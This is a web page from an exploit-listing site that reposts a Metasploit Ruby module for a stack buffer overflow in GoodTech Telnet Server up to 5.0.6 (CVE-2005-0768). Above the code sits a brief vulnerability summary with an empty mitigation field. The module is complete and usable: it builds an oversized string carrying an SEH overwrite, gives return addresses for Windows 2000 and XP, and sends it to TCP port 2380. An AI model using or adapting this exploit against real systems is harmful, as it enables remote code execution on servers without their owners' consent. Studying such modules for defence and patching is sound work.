Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
GoodTech Telnet Server - exploit.company
header-logo
Suggest Exploit
vendor:
Telnet Server
by:
MC
N/A
CVSS
N/A
Buffer Overflow
CWE
Product Name: Telnet Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2005-0768
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 2000 Pro English All, Windows XP Pro SP0/SP1 English

GoodTech Telnet Server <= 5.0.6 Buffer Overflow

This module exploits a stack buffer overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

Mitigation:

Source

Exploit-DB raw data:

##
# $Id: goodtech_telnet.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
				versions prior to 5.0.7. By sending an overly long string, an attacker can
				overwrite the buffer and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0768' ],
					[ 'OSVDB', '14806'],
					[ 'BID', '12815' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Mar 15 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(2380)
			], self.class)
	end

	def exploit
		connect

		sploit = rand_text_english(10020, payload_badchars)
		seh    = generate_seh_payload(target.ret)

		sploit[10012, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end